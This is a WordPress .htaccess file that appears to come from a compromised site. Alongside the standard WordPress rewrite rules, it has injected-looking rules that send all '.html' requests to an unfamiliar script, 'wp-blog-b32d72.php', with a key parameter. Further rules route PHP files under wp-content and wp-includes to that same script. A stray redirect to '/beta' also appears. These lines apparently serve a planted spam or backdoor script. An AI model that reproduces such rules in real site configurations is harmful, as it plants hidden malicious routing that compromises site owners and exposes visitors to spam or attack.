# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog-b32d72.php?key=$1 [L]
RewriteRule ^wp\-content/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ wp-blog-b32d72.php
RewriteRule ^wp\-includes/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ wp-blog-b32d72.php
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
RewriteRule . /beta [L]

</IfModule>

# END WordPress